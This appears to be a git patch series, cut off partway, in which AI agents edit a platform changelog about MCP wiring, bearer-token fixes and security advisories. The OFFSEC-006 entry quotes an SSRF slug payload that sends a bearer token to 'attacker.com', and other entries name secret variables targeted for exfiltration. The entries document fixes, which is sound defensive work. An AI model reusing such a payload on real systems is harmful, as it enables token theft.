From ab799e93b30d42b3a6e04c1c1720d08ee8a7522b Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 04:16:10 +0000 Subject: [PATCH 01/15] docs(changelog): add 2026-05-16 + backfill 2026-05-14 and 2026-05-15 entries MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2026-05-16: - Fix: Hermes workspace MCP server tools now reach agent loop (#22) - Internal: Files API groundwork (molecule-core#1247/#1255/#1257/#1267) - Internal: Scripts CI improvements (internal#431/#437) 2026-05-15: Quiet day โ€” docs queue maintenance (#40-49 open) 2026-05-14: - Security: OFFSEC-006 tenant slug SSRF fix (#933) - Fix: Canvas accessibility round 3 (#936, #949) - Internal: CI/CD hardening + test coverage Supersedes open docs#50 (2026-05-15 quiet-day entry). ๐Ÿค– Generated by Documentation Specialist daily-changelog cron. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 40 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 0717703..e1b4983 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -8,6 +8,46 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-16 + +### ๐Ÿ”ง Fixes + +- **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) + +### ๐Ÿงน Internal + +- **Platform Files API groundwork** (`molecule-core`): Phase 1โ€“3 of the Files API roots RFC (`internal#425`) landed across four PRs โ€” the `secrets` package now has a canonical credential-shape regex SSOT (`#1255`); the FilesTab canvas component gains an `/agent-home` root option and a secret-shape denial placeholder (`#1257`); the API gains a stub `allowedRoots` key with a 501 short-circuit (`#1247`); and the handler test suite was hardened to prevent data races during `db.DB` swap (`#1267`). These are infrastructure PRs that enable future per-container home directory isolation โ€” the `/agent-home` root will be documented when the API ships. +- **Scripts CI improvements** (`internal`): SOP tier-check now tolerates empty/invalid tokens while the token is being provisioned (`internal#431`); the `continue-on-error` guard on the PR-body gate is disabled when the runner backlog is draining to avoid silent pass (`internal#437`). + +--- + +## 2026-05-15 + +No customer-visible changes. All activity was internal infrastructure and SOP tooling. + +### ๐Ÿงน Internal + +- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) + +--- + +## 2026-05-14 + +### ๐Ÿ”’ Security + +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) + +### ๐Ÿ”ง Fixes + +- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) + +### ๐Ÿงน Internal + +- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). +- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). + +--- + ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From ba8ec52ca991de121d0ebf704d2f7ecce5d52d3a Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 10:15:36 +0000 Subject: [PATCH 02/15] docs(changelog): add hermes#23 bearer token 401 fix to 2026-05-16 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit molecule-ai-workspace-template-hermes#23: CONFIGS_DIR fix so molecule MCP server finds the bearer token at /configs/.auth_token. ๐Ÿค– Generated by Documentation Specialist cross-repo PR watch. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e1b4983..a5a1536 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -13,6 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) ### ๐Ÿงน Internal -- 2.52.0 From 2c85205ee7a7becd5bcf00da60949128695a92d7 Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:09:33 +0000 Subject: [PATCH 03/15] fix(changelog): remove inaccurate set -f clause from OFFSEC-006 entry The set -f clause was not part of the actual fix (validate_slug() RFC-1123 regex only). Technical-writer review identified the inaccuracy. Removes the clause per docs#51 REQUEST_CHANGES. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index a5a1536..54944e7 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -36,7 +36,7 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) ### ๐Ÿ”ง Fixes -- 2.52.0 From d14dccdd442f8ac9a6a903c1bb3e0dcbc101f5b3 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 13:38:28 +0000 Subject: [PATCH 04/15] docs(changelog): fold docs#45 unique entries into 2026-05-14 section MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds CWE-78 (expandWithEnv POSIX-identifier guard regression), OFFSEC-003 workspace-side A2A boundary marker escaping, OpenClaw template models config fix, CI infrastructure improvements, and handler test coverage additions from docs#45 โ€” consolidating all 2026-05-14 content into docs#51 so docs#45 can be closed. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 54944e7..e71e0eb 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -37,15 +37,20 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security - **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) +- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) ### ๐Ÿ”ง Fixes - **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) +- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) ### ๐Ÿงน Internal - **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). - **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). +- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) +- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) --- -- 2.52.0 From a56d2afe571fb91ec91b1fb5f0473a21e811f7ac Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:56:30 +0000 Subject: [PATCH 05/15] fix(changelog): trim duplicates per TW re-review Removes 2026-05-15 section (docs#49 is canonical) and all 2026-05-14 entries that duplicate docs#49 (OFFSEC-006, CWE-78, OFFSEC-003) and docs#45 (Canvas WCAG, OpenClaw, CI improvements, handler coverage). Keeps only the 2026-05-16 section with unique Hermes MCP + Files API + Scripts CI content. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 32 -------------------------------- 1 file changed, 32 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e71e0eb..00abcf8 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -22,38 +22,6 @@ Entries are published daily at 23:50 UTC. --- -## 2026-05-15 - -No customer-visible changes. All activity was internal infrastructure and SOP tooling. - -### ๐Ÿงน Internal - -- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) - ---- - -## 2026-05-14 - -### ๐Ÿ”’ Security - -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) -- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) -- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) - -### ๐Ÿ”ง Fixes - -- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) -- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) - -### ๐Ÿงน Internal - -- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). -- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). -- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) -- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) - ---- - ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From d1545857f494a7d6b5c804a82be0071f9de9d240 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:22:19 +0000 Subject: [PATCH 06/15] docs(changelog): add molecule-core#1327 platform-side bearer-token fix The hermes#23 bearer-token 401 was a two-part issue: workspace-side CONFIGS_DIR fix (already documented) and platform-side token-injection ownership fix (molecule-core#1327). Adds the platform-side fix to the same 2026-05-16 entry. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 00abcf8..403ffa6 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -13,7 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) -- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. (`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) ### ๐Ÿงน Internal -- 2.52.0 From f9ac456c4dc849c6aed52626ae681163b53bff9e Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:23:43 +0000 Subject: [PATCH 07/15] docs(changelog): add claude-code#24 Kimi K2.6 routing to 2026-05-16 Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 403ffa6..6cbdde3 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -14,6 +14,7 @@ Entries are published daily at 23:50 UTC. - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) - **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. (`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) +- **Claude Code template Kimi K2.6 model routed to official `api.kimi.com/coding` endpoint**: the Claude Code workspace template's adapter now correctly routes `Kimi K2.6` to the official Kimi coding endpoint (`api.kimi.com/coding`) instead of the default Anthropic-compatible endpoint, per Kimi's official API specification. (`molecule-ai-workspace-template-claude-code` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-claude-code/pulls/24)) ### ๐Ÿงน Internal -- 2.52.0 From 48f20174a67e1b010ae9c2672b6f8dce23216123 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:40:16 +0000 Subject: [PATCH 08/15] =?UTF-8?q?docs(changelog):=20add=202026-05-17=20ent?= =?UTF-8?q?ry=20=E2=80=94=20OpenClaw=20template=20adapter=20fixes?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Covers openclaw#18 (unroutable model default coercion), openclaw#14+#17 (Minimax + Kimi-For-Coding key routing), and openclaw#16 (molecule A2A MCP server registration with OpenClaw). Cross-links to the 2026-05-16 section for the Hermes + bearer-token fixes documented in docs#51. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 6cbdde3..fa57d7e 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -8,6 +8,18 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-17 + +### ๐Ÿ”ง Fixes + +- **OpenClaw template adapter routing: fresh provisions now serve correctly**: OpenClaw workspace provisions were failing immediately after launch โ€” the adapter had no routing path for the default model, causing every new workspace to be non-functional on first boot. The adapter now coerces an unroutable model to a known-good default, ensuring new OpenClaw workspaces are immediately usable without manual configuration. (`molecule-ai-workspace-template-openclaw` [#18](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/18)) +- **OpenClaw template MiniMax and Kimi-For-Coding API keys routed to correct endpoints**: the OpenClaw adapter was routing all Minimax (`sk-cp-*` keys) and Kimi-For-Coding (`sk-kimi-*` keys) API calls to the wrong endpoints, causing HTTP 401 errors on every chat turn. Minimax calls now route to the Anthropic-compatible gateway; Kimi-For-Coding calls route via Moonshot's Anthropic-compat endpoint, mirroring the existing MiniMax fix. (`molecule-ai-workspace-template-openclaw` [#14](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/14), [#17](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/17)) +- **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. (`molecule-ai-workspace-template-openclaw` [#16](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/16)) + +> **Note:** Yesterday's (2026-05-16) changelog entry covers Hermes workspace MCP server wiring, bearer-token 401 fixes, Claude Code template Kimi K2.6 routing, and the platform-side token-injection ownership fix โ€” see the [2026-05-16 section](#2026-05-16) below. + +--- + ## 2026-05-16 ### ๐Ÿ”ง Fixes -- 2.52.0 From ff1b3f6caf763f33955bf677e5ba6436a53d08bb Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 15:00:21 +0000 Subject: [PATCH 09/15] =?UTF-8?q?fix(changelog):=20remove=202026-05-16=20s?= =?UTF-8?q?ection=20=E2=80=94=20docs#51=20is=20canonical?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit docs#51 (which should merge first) adds the 2026-05-16 section. docs#52 now contains only the 2026-05-17 OpenClaw template fixes to avoid merge conflicts. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index fa57d7e..939d48c 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -20,21 +20,6 @@ Entries are published daily at 23:50 UTC. --- -## 2026-05-16 - -### ๐Ÿ”ง Fixes - -- **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) -- **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the 